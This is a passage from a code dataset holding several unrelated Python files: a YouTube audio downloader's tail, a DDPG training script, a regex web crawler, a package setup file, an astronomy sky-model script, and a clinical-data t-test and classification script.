-ab 160k \\\"\"+aname.split('.')[0]+\"_.mp3\"+\"\\\"\")\r\n os.remove(aname)\r\n else:\r\n print('[*] Enter correct choice like 243')\r\n playlist()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Wanna Be Cool\r\n print(ff('YToff' ,font=['block', 'isometric1', 'isometric2'][randint(0,2)]))\r\n\r\n url = input('[+] Url for Video/Playlist: ')\r\n\r\n # Decide if playlist or single track\r\n try:\r\n if 'https://www.youtube.com/playlist?' in url:\r\n playlist(url)\r\n else:\r\n single(url)\r\n except Exception as e:\r\n print(e, '\\n[*] Give YouTube Video or Playlist link.')\r\n\r\n input(' [F][U][L][L][][S][U][C][C][E][S][S] ')\r\n\r\n","sub_path":"YToff.py","file_name":"YToff.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"366920491","text":"\"\"\" main file to train agent in the env \"\"\"\nimport argparse\nimport sys\nimport os\nimport gym\nimport time\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom gym.spaces.box import Box\nfrom gym.spaces.discrete import Discrete\nfrom collections import deque\nfrom unityagents import UnityEnvironment\nfrom baselines import bench\nfrom baselines.common.atari_wrappers import make_atari, wrap_deepmind\nfrom baselines.common.atari_wrappers import FrameStack as FrameStack_\nfrom baselines.common.vec_env.subproc_vec_env import SubprocVecEnv, VecEnv\n\nfrom envs import Task\nfrom envs import OrnsteinUhlenbeckProcess\nfrom envs import LinearSchedule\nfrom config import Config\nfrom ac_model import DeterministicActorCriticNet\nfrom memory import Replay\nfrom ddpg_agent import DDPGAgent\nfrom ddpg_agent import FCBody\nfrom ddpg_agent import TwoLayerFCBodyWithAction\n\n\n\ndef main(arg):\n \"\"\" \n\n Args:\n param1: (args)\n param2: (config)\n \n \"\"\"\n env = UnityEnvironment(file_name='Reacher_Linux/Reacher.x86_64', no_graphics=True)\n \n # get the default brain\n brain_name = env.brain_names[0]\n brain = env.brains[brain_name]\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n\n # number of agents\n num_agents = len(env_info.agents)\n print('Number of agents:', num_agents)\n states = env_info.vector_observations\n\n print('Size of each action:', brain.vector_action_space_size)\n print(states.shape[1])\n\n config = Config()\n config.state_dim = states.shape[1]\n config.action_dim = brain.vector_action_space_size\n\n\n con = set_config(config, arg) \n agent = DDPGAgent(config)\n agent.random_process = config.random_process_fn()\n agent_name = agent.__class__.__name__\n t0 = time.time()\n n_episodes = arg.n_episodes\n train_every = arg.train_every\n repeat_learn = arg.repeat_learning\n total_steps = 0\n scores_window = deque(maxlen=100) # last 100 scores\n all_agents = [[]for x in range(num_agents)] \n agents_rewards = [scores_window for x in range(num_agents)]\n for i_episode in range(1, n_episodes+1):\n scores = np.zeros(num_agents) \n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # get the current state (for each agent)\n agent.random_process.reset_states()\n scores = np.zeros(num_agents) \n while True:\n total_steps +=1\n actions = []\n for state in states:\n action = (agent.network(state))\n action = action.cpu().detach().numpy()\n action += agent.random_process.sample()\n actions.append(action)\n env_info = env.step(actions)[brain_name]\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n scores += env_info.rewards # update the score (for each agent)\n for state, action, reward, next_state, done in zip(states, actions, rewards, next_states, dones):\n agent.replay.feed([state, action, reward, next_state, int(done)])\n states = next_states\n if total_steps % train_every == 0:\n for _ in range(repeat_learn):\n agent.learn()\n if np.any(dones):\n for score, one_agent, agent_reward in zip(scores, all_agents, agents_rewards):\n one_agent.append(score)\n agent_reward.append(score)\n print('\\rEpisode {}\\t Average Score all: {:.2f} , Score: {:.2f} Time: {:.2f}'.format(i_episode,\n np.mean(agents_rewards),\n np.mean(scores), time.time() - t0))\n break\n if np.mean(agents_rewards[0]) >= 30:\n print('total steps: ', total_steps)\n agent.save('smart')\n print(\"save smart agent\")\n return all_agents\n\n\ndef save_and_plot(score, model_num):\n \"\"\" saves the result of the training into the given file\n Args:\n param1 (list): score\n param2 (int):\n \"\"\"\n fig = plt.figure()\n fig.add_subplot(111)\n plt.plot(np.arange(len(score)), score)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.savefig('scores.png')\n # plt.show()\n\n df = pd.DataFrame({'episode':np.arange(len(score)), 'score':score})\n df.set_index('episode', inplace=True)\n df.to_csv('scores.csv'.format(model_num))\n\n\n\ndef set_config(config, args):\n \"\"\" \n Args:\n param1: (args): args\n Return config\n \"\"\"\n config.max_steps = int(1e6)\n config.eval_interval = int(1e4)\n config.eval_episodes = 20\n config.save_interval = 10000\n config.discount= args.discount\n config.network_fn = lambda: DeterministicActorCriticNet(\n config.state_dim, config.action_dim,\n actor_body=FCBody(config.state_dim, (args.hidden_size1,\n args.hidden_size2), gate=F.relu),\n critic_body=TwoLayerFCBodyWithAction(config.state_dim,\n config.action_dim, (args.hidden_size1, args.hidden_size2), gate=F.relu),\n actor_opt_fn=lambda params: torch.optim.Adam(params, lr=args.lr),\n critic_opt_fn=lambda params: torch.optim.Adam(params, lr=args.lr))\n config.replay_fn = lambda: Replay(memory_size=args.memory_capacity,\n batch_size=args.batch_size)\n config.discount = 0.99\n config.random_process_fn = lambda: OrnsteinUhlenbeckProcess(size=(config.action_dim, ), std=LinearSchedule(0.2))\n config.min_memory_size = 10000\n config.target_network_mix = 1e-3\n config.DEVICE = 'cuda:0'\n \n return config\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='DDPGg')\n parser.add_argument('--hidden-size1', type=int, default=400, metavar='SIZE', help='Network hidden size')\n parser.add_argument('--hidden-size2', type=int, default=300, metavar='SIZE', help='Network hidden size')\n parser.add_argument('--memory-capacity', type=int, default=int(1e6), metavar='CAPACITY', help='Experience replay memory capacity')\n parser.add_argument('--lr', type=float, default=2e-4, metavar='mue', help='Learning rate')\n parser.add_argument('--adam-eps', type=float, default=1e-8, metavar='eps', help='Adam epsilon')\n parser.add_argument('--batch-size', type=int, default=64, metavar='SIZE', help='Batch size')\n parser.add_argument('--train_every', default=20)\n parser.add_argument('--discount', type=float, default=0.99, metavar='gamma', help='Discount factor') \n parser.add_argument('--n_episodes', default=500)\n parser.add_argument('--repeat_learning', type=int, default=10)\n parser.add_argument('--model_num', default=0)\n arg = parser.parse_args()\n s= main(arg)\n save_and_plot(s, arg.model_num)\n","sub_path":"20Agents/ddpg_main.py","file_name":"ddpg_main.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"419170852","text":"#! usr/bin/python3\n\n# This is meant to be a rudimentary crawler using regular expressions.\n# Scrappy is a great tool but I may find it easier to target javascript elements using something like this.\n# Extend depth layers by calling the generic_crawl function with the last regex results as arg.\n\n\nimport urllib.request\nimport re\nimport sys\nfrom threading import Thread\n\n\nORIGIN_URL = sys.argv[1]\n\n\ndef crawl_faster(bot):\n threadx = Thread(target=bot)\n threadx.setDaemon(True)\n threadx.start()\n\n\nSAVE_SCRAPED = {} # this will be global save file.\ndef save_to_file(scraped_data):\n if sys.argv[2] == \"save\" and sys.argv[3] != None:\n with open(sys.argv[3],\"a\") as savefile:\n savefile.write(scraped_data)\n\n\nclass Crawler():\n def __init__(self):\n self.fake_header = {}\n self.fake_header['User-Agent'] = \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/66.0.3359.181 Chrome/66.0.3359.181 Safari/537.36\"\n self.fake_header['Accept-Language'] = \"en-US,en;q=0.9\"\n self.fake_header['Cache-Control'] = \"no-cache\"\n\n def start(self, *optional_url):\n if optional_url:\n self.req = urllib.request.Request(url='https://'+optional_url[0], headers=self.fake_header)\n else:\n self.req = urllib.request.Request(url=sys.argv[1],headers=self.fake_header)\n self.start_page = urllib.request.urlopen(self.req)\n self.data = self.start_page.read()\n\n def find(self, regex_pattern):\n self.result = re.findall(regex_pattern, self.data.decode())\n return self.result\n\n\nbot = Crawler()\nbot.start()\ninitial_regex_input = input(\"Initial regex pattern.\\nPress enter to skip, default pattern searches for https://\\n\")\nif len(initial_regex_input) == 0:\n results = bot.find(r\"href=\\\"https://(.*?)\\\"\")\nelse:\n results = bot.find(initial_regex_input)\n\nsecondary_pages_scrape = {}\niframe_links = {} # make tidy catalogue, use json module to save as json.\n\ndef generic_crawl(initial_crawl_data):\n user_re = input(\"Insert secondary page regex grapple.\\nUseful example: href=\\\\\\\"(.*)\\\\\\\"\\n\")\n for x in initial_crawl_data: # this is to filter irrelevant links, this is reusable.\n if len(re.findall(r\"(google|blogger|youtube|facebook|disqus|\\.css|\\.js).*?\",x)) == 0:\n gruntbot = Crawler()\n try:\n gruntbot.start(x)\n print(\"\\n PAGE %s\\n\" % x)\n secondary_pages_scrape[x] = gruntbot.find(user_re)\n print(secondary_pages_scrape[x], \"\\nEND PAGE %s\\n\\n\" % x)\n except Exception as e:\n print('URL ERROR @gruntbot: ',e)\n continue\n else:\n continue\n\ndef gruntbot_crawl():\n generic_crawl(results)\n\n\ncrawl_faster(gruntbot_crawl())\n\nfor each_list in secondary_pages_scrape: #videos was part of my regex ...\n for list_page in secondary_pages_scrape[each_list]:\n print(\"\\n\",ORIGIN_URL+\"/videos/\"+list_page)\n","sub_path":"crawl/litewolfcrawler.py","file_name":"litewolfcrawler.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433721729","text":"# coding=utf-8\n\"\"\"\nIdealista API setup\n\"\"\"\n__copyright__ = 'Copyright 2016, DNest'\n\nfrom setuptools import setup, find_packages\n\n# Dynamically calculate the version based on idealista.VERSION.\nVERSION = __import__('idealista').get_version()\n\n\nsetup(\n name='idealista-api-python',\n version=VERSION,\n url='https://bitbucket.org/abalt/idealista-api-python',\n author='DNest',\n author_email='admin@dnestagency.com',\n description=(\n \"Upload properties to Idealista using IDEALISTA API.\"),\n long_description=open('README.rst').read(),\n keywords=\"Idealista, Properties, Rent, Sale\",\n license=open('LICENSE').read(),\n packages=find_packages(),\n include_package_data=True,\n install_requires=[],\n download_url='https://bitbucket.org/abalt/idealista-api-python/get/0.1.3.zip',\n # See http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Other/Nonlisted Topic'],\n)\n","sub_path":"pypi_install_script/idealista-api-python-0.1.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"504434057","text":"#!/usr/bin/env python\n#\n# See top-level LICENSE file for Copyright information\n#\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script computes the fiber flat field correction from a DESI continuum lamp frame.\n\"\"\"\n\nfrom desispec.io import read_frame\nfrom desispec.io import read_fibermap\nfrom desispec.io import read_fiberflat\nfrom desispec.io import write_sky\nfrom desispec.fiberflat import apply_fiberflat\nfrom desispec.sky import compute_sky\nfrom desispec.log import get_logger\nimport argparse\nimport numpy as np\nimport sys\n\ndef main() :\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--infile', type = str, default = None, required=True,\n help = 'path of DESI exposure frame fits file')\n parser.add_argument('--fibermap', type = str, default = None, required=True,\n help = 'path of DESI exposure frame fits file')\n parser.add_argument('--fiberflat', type = str, default = None, required=True,\n help = 'path of DESI fiberflat fits file')\n parser.add_argument('--outfile', type = str, default = None, required=True,\n help = 'path of DESI sky fits file')\n\n\n args = parser.parse_args()\n log=get_logger()\n\n log.info(\"starting\")\n\n # read exposure to load data and get range of spectra\n frame = read_frame(args.infile)\n specmin=frame.header[\"SPECMIN\"]\n specmax=frame.header[\"SPECMAX\"]\n\n # read fibermap to locate sky fibers\n fibermap = read_fibermap(args.fibermap)\n selection=np.where((fibermap[\"OBJTYPE\"]==\"SKY\")&(fibermap[\"FIBER\"]>=specmin)&(fibermap[\"FIBER\"]<=specmax))[0]\n if selection.size == 0 :\n log.error(\"no sky fiber in fibermap %s\"%args.fibermap)\n sys.exit(12)\n\n # read fiberflat\n fiberflat = read_fiberflat(args.fiberflat)\n\n # apply fiberflat to sky fibers\n apply_fiberflat(frame, fiberflat)\n\n # compute sky model\n skymodel = compute_sky(frame, fibermap)\n\n # write result\n write_sky(args.outfile, skymodel, frame.header)\n\n log.info(\"successfully wrote %s\"%args.outfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/desi_compute_sky.py","file_name":"desi_compute_sky.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349848912","text":"__author__ = 'jinghe'\n\nimport numpy as np\nfrom sklearn import metrics\nimport pickle\nimport Feature_transformation as feature_transform\nimport Experiments\nfrom sklearn.svm import SVC\nfrom sklearn import neighbors\nfrom sklearn.lda import LDA\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom scipy import stats\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport copy\nimport operator\nimport random\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nimport collections\nimport csv\n\ndef otherMetrics(mat):\n TP = mat[0, 0] \n FN = mat[0, 1]\n FP = mat[1, 0]\n TN = mat[1, 1]\n acc = (TP + TN) / (TP + FP + FN +TN)\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = 2 * precision * recall / (precision + recall)\n precision_c = TN / (TN + FN)\n recall_c = TN / (TN + FP)\n f1_c = 2 * precision_c * recall_c / (precision_c + recall_c)\n return [acc, precision, recall, f1, precision_c, recall_c, f1_c]\n \n \ndef prediction(clf, X_train, y_train, X_test, y_test):\n clf.fit(X_train, y_train)\n predicted = clf.predict(X_test)\n results = metrics.classification_report(y_test, predicted)\n confusion_mat = metrics.confusion_matrix(y_test, predicted) \n others = otherMetrics(confusion_mat)\n return results, others#, clf.coef_\n\n\ndef colNames(all_meds, all_procs):\n k1 = list(dict.fromkeys(all_meds).keys())\n k2 = list(dict.fromkeys(all_procs).keys())\n k = k1 + k2\n l = len(k)\n i = 0\n d_names = {}\n while i < l:\n d_names[i] = k[i]\n i += 1\n return d_names\n\n\ndef prediction_experiments(X_train, y_train, X_test, y_test, s, c):\n# X_train, X_test, y_train, y_test = cross_validation.train_test_split(data, response, test_size=0.25, random_state=0)\n \n clf_lr = LogisticRegression(penlaty='l1', C=c)\n results_lr = prediction(clf_lr, X_train, y_train, X_test, y_test)\n \n \n# clf_rf = RandomForestClassifier(n_estimators=20, criterion='entropy')\n# results_rf = prediction(clf_rf, X_train, y_train, X_test, y_test)\n# \n# clf_lda = LDA()\n# results_lda = prediction(clf_lda, X_train, y_train, X_test, y_test)\n#\n# clf_nb = MultinomialNB()\n# results_nb = prediction(clf_nb, X_train, y_train, X_test, y_test)\n# \n# nneighbors = 5\n# clf_knn1 = neighbors.KNeighborsClassifier(nneighbors, weights='uniform')\n# results_knn1 = prediction(clf_knn1, X_train, y_train, X_test, y_test)\n#\n# clf_knn2 = neighbors.KNeighborsClassifier(nneighbors, weights='distance')\n# results_knn2 = prediction(clf_knn2, X_train, y_train, X_test, y_test)\n#\n# clf_ada = AdaBoostClassifier(n_estimators=100)\n# results_ada = prediction(clf_ada, X_train, y_train, X_test, y_test)\n#\n# clf_svm1 = SVC(kernel='linear')\n# results_svm1 = prediction(clf_svm1, X_train, y_train, X_test, y_test)\n#\n# clf_svm2 = SVC(kernel='rbf')\n# results_svm2 = prediction(clf_svm2, X_train, y_train, X_test, y_test)\n\n # print the classification performance\n print('Logistic Regression Classification Results - %s:' % s)\n print(results_lr[0])\n \n# print('Linear SVM Classification Results - %s:' % s)\n# print(results_svm1)\n#\n# print('RBF-SVM Classification Results - %s:' % s)\n# print(results_svm2)\n#\n# print('Random Forest Classification Results - %s:' % s)\n# print(results_rf)\n#\n# print('KNN (majority voting) Classification Results - %s:' % s)\n# print(results_knn1)\n#\n# print('KNN (weighted distance) Classification Results - %s:' % s)\n# print(results_knn2)\n#\n# print('AdaBoost Classification Results - %s:' % s)\n# print(results_ada)\n# \n# print('Multinomial Naive Bayes Classification Results - %s:' % s)\n# print(results_nb)\n#\n# print('LDA Classification Results - %s:' % s)\n# print(results_lda)\n\n# return results_lr, results_svm1, results_svm2, results_rf, results_knn1, results_knn2, results_ada, results_lda, results_nb\n return np.array(results_lr[1])\n \n\ndef selectCols(data1, data2):\n data_both = pd.concat([data1, data2], axis=0, ignore_index=True)\n col_nonzeros = data_both.astype(bool).sum(axis=0)\n col_nonzeros2 = col_nonzeros.to_dict()\n cols = []\n for k, v in col_nonzeros2.items():\n if v > 0 and k != 'response':\n cols.append(k)\n return cols\n\n\ndef statTesting(data1, data2, cols):\n test_results = {}\n for i in cols:\n test = stats.ttest_ind(data1[i], data2[i], equal_var=False)\n if test[1] > 0:\n test_results[i] = test[1]\n results_rank = sorted(test_results.items(), key=operator.itemgetter(1))\n return results_rank\n\n\ndef statTesting_allgroups(chf, dm, ckd, copd):\n cols = {}\n cols['chf_vs_dm'] = selectCols(chf, dm)\n cols['chf_vs_ckd'] = selectCols(chf, ckd)\n cols['chf_vs_copd'] = selectCols(chf, copd)\n cols['dm_vs_ckd'] = selectCols(dm, ckd)\n cols['dm_vs_copd'] = selectCols(dm, copd)\n cols['ckd_vs_copd'] = selectCols(ckd, copd)\n\n results = {}\n results['chf_vs_dm'] = statTesting(chf, dm, cols['chf_vs_dm'])\n results['chf_vs_ckd'] = statTesting(chf, ckd, cols['chf_vs_ckd'])\n results['chf_vs_copd']= statTesting(chf, copd, cols['chf_vs_copd'])\n results['dm_vs_ckd'] = statTesting(dm, ckd, cols['dm_vs_ckd'])\n results['dm_vs_copd'] = statTesting(dm, copd, cols['dm_vs_copd'])\n results['ckd_vs_copd'] = statTesting(ckd, copd, cols['ckd_vs_copd'])\n return results, cols\n\n\ndef statTesting_sampleOnce(data1, data2, col, size, r, thres):\n sample1 = data1.sample(n=size, replace=False, random_state=r)\n sample2 = data2.sample(n=size, replace=False, random_state=r)\n results = statTesting(sample1, sample2, col)\n results_new = significant_items_one([], results, thres)\n return results, results_new\n\n \ndef statTesting_sampleMultiple(data1, data2, col, thres):\n all_sizes = [100, 200, 300, 500, 800]\n results = {}\n for i in range(len(all_sizes)):\n results[all_sizes[i]] = []\n for j in range(1, 11):\n if all_sizes[i] <= min(len(data1), len(data2)):\n res = statTesting_sampleOnce(data1, data2, col, all_sizes[i], j, thres)\n results[all_sizes[i]].append(res)\n return results\n\n\ndef significant_items_one(res, value, thres):\n for k, v in value:\n if v <= thres:\n res.append(k)\n return res\n \n\ndef distinctItems(results, thres, s0='_medproc_'):\n results_new = dict.fromkeys(results.keys())\n# results_ranks = dict.fromkeys(results.keys())\n for key, value in results.items():\n results_new[key] = []\n significant_items_one(results_new[key], value, thres)\n# results_rank0 = sorted(value, key=operator.itemgetter(1))\n# results_ranks[key] = results_rank0\n df = pd.Series(results_new[key])\n df.to_csv(key + s0 + 'selected_items_ttest.csv', header=False, index=False)\n return results_new\n\n\ndef sample_ttest_experiments_all(chf, dm, ckd, copd, selected_cols, thres):\n sample_results = {}\n rs_chf_dm = statTesting_sampleMultiple(chf, dm, selected_cols['chf_vs_dm'], thres)\n rs_chf_ckd = statTesting_sampleMultiple(chf, ckd, selected_cols['chf_vs_ckd'], thres)\n rs_chf_copd = statTesting_sampleMultiple(chf, copd, selected_cols['chf_vs_copd'], thres)\n rs_dm_ckd = statTesting_sampleMultiple(dm, ckd, selected_cols['dm_vs_ckd'], thres)\n rs_dm_copd = statTesting_sampleMultiple(dm, copd, selected_cols['dm_vs_copd'], thres)\n rs_ckd_copd = statTesting_sampleMultiple(ckd, copd, selected_cols['ckd_vs_copd'], thres)\n sample_results['chf_vs_dm'] = rs_chf_dm\n sample_results['chf_vs_ckd'] = rs_chf_ckd\n sample_results['chf_vs_copd'] = rs_chf_copd\n sample_results['dm_vs_ckd'] = rs_dm_ckd\n sample_results['dm_vs_copd'] = rs_dm_copd\n sample_results['ckd_vs_copd'] = rs_ckd_copd\n return sample_results\n\n\ndef Classification_ttest_all(selected_cols, thres, size):\n sample_results = {}\n sample_results['chf_vs_dm'] = Classification_ttest(selected_cols['chf_vs_dm'], thres, size, 'chf', 'dm')\n sample_results['chf_vs_ckd'] = Classification_ttest(selected_cols['chf_vs_ckd'], thres, size, 'chf', 'ckd')\n sample_results['chf_vs_copd'] = Classification_ttest(selected_cols['chf_vs_copd'], thres, size, 'chf', 'copd')\n sample_results['dm_vs_ckd'] = Classification_ttest(selected_cols['dm_vs_ckd'], thres, size, 'dm', 'ckd')\n sample_results['dm_vs_copd'] = Classification_ttest(selected_cols['dm_vs_copd'], thres, size, 'dm', 'copd')\n sample_results['ckd_vs_copd'] = Classification_ttest(selected_cols['ckd_vs_copd'], thres, size, 'ckd', 'copd')\n return sample_results\n \n\ndef Classification_lasso_all(selected_cols, thres, size):\n sample_results = {}\n sample_results['chf_vs_dm'] = Classification_lasso(selected_cols['chf_vs_dm'], thres, size, 'chf', 'dm')\n sample_results['chf_vs_ckd'] = Classification_lasso(selected_cols['chf_vs_ckd'], thres, size, 'chf', 'ckd')\n sample_results['chf_vs_copd'] = Classification_lasso(selected_cols['chf_vs_copd'], thres, size, 'chf', 'copd')\n sample_results['dm_vs_ckd'] = Classification_lasso(selected_cols['dm_vs_ckd'], thres, size, 'dm', 'ckd')\n sample_results['dm_vs_copd'] = Classification_lasso(selected_cols['dm_vs_copd'], thres, size, 'dm', 'copd')\n sample_results['ckd_vs_copd'] = Classification_lasso(selected_cols['ckd_vs_copd'], thres, size, 'ckd', 'copd')\n return sample_results\n \n \ndef Fearture_ttest_sampleOnce(train1, train2, col, thres):\n results_feature = statTesting(train1, train2, col)\n selected_features = significant_items_one([], results_feature, thres)\n return selected_features\n \n \ndef Feature_classify_samplesOnce(train1, train2, test1, test2, selected_features, c): \n train, train_response, test, test_response = prepareClassificationData(train1, train2, test1, test2, selected_features)\n results_classification = prediction_experiments(train, train_response, test, test_response, 'RawData', c)\n return results_classification\n \n \ndef createTrainTest(data1, data2, selected_features):\n train1 = data1[selected_features] \n train2 = data2[selected_features]\n train = train1.append(train2)\n response = [1] * len(train1) + [2] * len(train2)\n return train, response\n \n \ndef prepareClassificationData(train1, train2, test1, test2, selected_features):\n X_train, y_train = createTrainTest(train1, train2, selected_features)\n X_test, y_test = createTrainTest(test1, test2, selected_features)\n return X_train, y_train, X_test, y_test\n \n\ndef getSamples(data, r, s):\n train, test = train_test_split(data, test_size = size, random_state=r)\n train.to_csv(str(r) + '_' + s + '_train.csv', header=True, index=False)\n test.to_csv(str(r) + '_' + s + '_test.csv', header=True, index=False)\n\n \n \ndef getSamples_all(chf, dm, ckd, copd):\n for j in range(1, 11):\n getSamples(chf, j, 'chf')\n getSamples(dm, j, 'dm')\n getSamples(ckd, j, 'ckd')\n getSamples(copd, j, 'copd') \n \n \ndef Classification_ttest(col, thres, size, s1, s2, c=1000000000000000000):\n all_features_ttest = []\n classification_all_ttest = []\n\n for j in range(1, 11):\n train1 = pd.read_csv(str(j) + '_' + s1 + '_train.csv', header=0)\n train2 = pd.read_csv(str(j) + '_' + s2 + '_train.csv', header=0)\n test1 = pd.read_csv(str(j) + '_' + s1 + '_test.csv', header=0)\n test2 = pd.read_csv(str(j) + '_' + s2 + '_test.csv', header=0)\n # t test to select features\n selected_features_ttest = Fearture_ttest_sampleOnce(train1, train2, col, thres) \n classifications_ttest = Feature_classify_samplesOnce(train1, train2, test1, test2, selected_features_ttest, c)\n all_features_ttest += selected_features_ttest\n classification_all_ttest.append(classifications_ttest)\n \n # ttest-based results summary\n feature_counts_ttest = collections.Counter(all_features_ttest)\n features_rank_ttest = sorted(dict(feature_counts_ttest).items(), key=operator.itemgetter(1), reverse=True)\n# feature_rank = feature_counts.most_common(10)\n classification_ttest_avg, classification_ttest_std = calcAvgStd(classification_all_ttest)\n \n return features_rank_ttest, classification_ttest_avg, classification_ttest_std\n \n\n#features_lasso['ckd_vs_copd'] = [\"XR.CHEST.SINGLE.VW\", \"Antiasthmatic\", \"MUMPS..IGG\", \"CT.SHOULDER.RIGHT..RADIOLOGIST.TO.RECOMMEND.CONTRAST.\"]\ndef Classification_lasso(col, thres, size, s1, s2, c=1.0):\n# all_features_lasso = []\n classification_all_lasso = []\n for j in range(1, 11):\n train1 = pd.read_csv(str(j) + '_' + s1 + '_train.csv', header=0)\n train2 = pd.read_csv(str(j) + '_' + s2 + '_train.csv', header=0)\n test1 = pd.read_csv(str(j) + '_' + s1 + '_test.csv', header=0)\n test2 = pd.read_csv(str(j) + '_' + s2 + '_test.csv', header=0)\n \n # classification based on the LASSO features\n# all_features_lasso += features_lasso[j-1]\n classifications_lasso = Feature_classify_samplesOnce(train1, train2, test1, test2, col, c) \n classification_all_lasso.append(classifications_lasso)\n \n# feature_counts_lasso = collections.Counter(all_features_lasso)\n# features_rank_lasso = sorted(dict(feature_counts_lasso).items(), key=operator.itemgetter(1), reverse=True)\n# feature_rank = feature_counts.most_common(10)\n classification_lasso_avg, classification_lasso_std = calcAvgStd(classification_all_lasso)\n \n return classification_lasso_avg, classification_lasso_std, #features_rank_lasso\n\n \n \ndef calcAvgStd(data):\n data_sum = np.zeros(len(data[0]))\n for d in data:\n data_sum += d\n avgs = data_sum / len(data)\n \n data_std = []\n for i in range(len(data[0])):\n data_aggr = []\n for j in range(len(data)):\n data_aggr.append(data[j][i])\n stDev = np.std(data_aggr)\n data_std.append(stDev)\n return avgs, data_std\n \n\ndef resultCompare(results1, results2, ind1=0, ind2=1):\n comparison = {} \n comparison_res = []\n for key, value in results1.items():\n comparison[key] = {}\n avgs1 = value[ind1]\n stds1 = value[ind1 + 1]\n avgs2 = results2[key][ind2]\n stds2 = results2[key][ind2 + 1]\n comparison[key]['Avg'] = np.array(avgs1) - np.array(avgs2)\n comparison[key]['Std'] = np.array(stds1) - np.array(stds2)\n comparison_res.append(comparison[key]['Avg'])\n comparison_df = pd.DataFrame(comparison_res, columns=['Acc', 'Prec1', 'Recall1', 'F1score1', 'Prec2', 'Recall2', 'F1score2'])\n comparison_df.index = results1.keys() \n return comparison, comparison_df\n \n \ndef writetocsv(data, filename):\n f = open(filename, 'w', newline='\\n', encoding='utf8')\n mywriter = csv.writer(f)\n for i in data:\n mywriter.writerow(i)\n f.close()\n print('Finish writing to csv!')\n \nif __name__ == '__main__':\n # load the patient matrix data\n with open('Pts_data_matrices.pickle', 'rb') as f:\n pts_meds_dict, pts_procs_dict, pts_matrix, pts_matrix_response = pickle.load(f, encoding='utf-8')\n f.close()\n\n # 94 patients\n with open('all_meds.pickle', 'rb') as f:\n all_meds = pickle.load(f, encoding='utf-8')\n f.close()\n\n # 5,907patients\n with open('all_procs.pickle', 'rb') as f:\n all_procs = pickle.load(f, encoding='utf-8')\n f.close()\n\n data = np.array(pts_matrix)\n response = np.array(pts_matrix_response)\n d_names = colNames(all_meds, all_procs)\n # make the key, value into value, key in d_names\n d_names_inds = {}\n for k, v in d_names.items():\n d_names_inds[v] = k\n \n with open('all_proc_cats_dict.pickle', 'rb') as f1:\n proc_cats_all = pickle.load(f1)\n \n proc_cat_inds = dict.fromkeys(proc_cats_all)\n for key, value in proc_cats_all.items():\n proc_cat_inds[key] = []\n s0 = ''\n for v in value:\n s0 += str(d_names_inds[v]) + '%#%'\n proc_cat_inds[key] = s0 \n proc_cat_list = list(proc_cat_inds.values())\n proc_cat_list_df = pd.Series(proc_cat_list)\n proc_cat_list_df.to_csv('proc_categories.csv', header=False, index=False) \n \n \n #==================================Experiemnt 1: hypothesis testing=================================================\n\n pts_matrix_df = pd.DataFrame(pts_matrix, columns=d_names.values())\n pts_matrix_df['response'] = response\n\n pts_matrix_df.to_csv('pts_matrix_df.csv', header=True, index=False)\n pts_matrix_df = pd.read_csv('pts_matrix_df.csv', header=0)\n\n\n chf = pts_matrix_df[pts_matrix_df['response'] == 1]\n dm = pts_matrix_df[pts_matrix_df['response'] == 2]\n ckd = pts_matrix_df[pts_matrix_df['response'] == 3]\n copd = pts_matrix_df[pts_matrix_df['response'] == 4]\n \n \n test_results, selected_cols = statTesting_allgroups(chf, dm, ckd, copd)\n sig_items = distinctItems(test_results, 0.05)\n with open('ttest_results.pickle', 'wb') as f:\n pickle.dump([test_results, selected_cols, sig_items], f)\n\n samples_results = sample_ttest_experiments_all(chf, dm, ckd, copd, selected_cols, 0.05)\n with open('ttest_results_samples.pickle', 'wb') as f:\n pickle.dump(samples_results, f)\n \n # samples \n all_meds.add('response')\n chf_meds = chf[list(all_meds)]\n dm_meds = dm[list(all_meds)]\n ckd_meds = ckd[list(all_meds)]\n copd_meds = copd[list(all_meds)]\n \n test_results_meds, selected_cols_meds = statTesting_allgroups(chf_meds, dm_meds, ckd_meds, copd_meds)\n sig_items_meds = distinctItems(test_results_meds, 0.05, '_med_')\n with open('ttest_results_meds.pickle', 'wb') as f:\n pickle.dump([test_results_meds, selected_cols_meds, sig_items_meds], f)\n \n samples_results_meds = sample_ttest_experiments_all(chf_meds, dm_meds, ckd_meds, 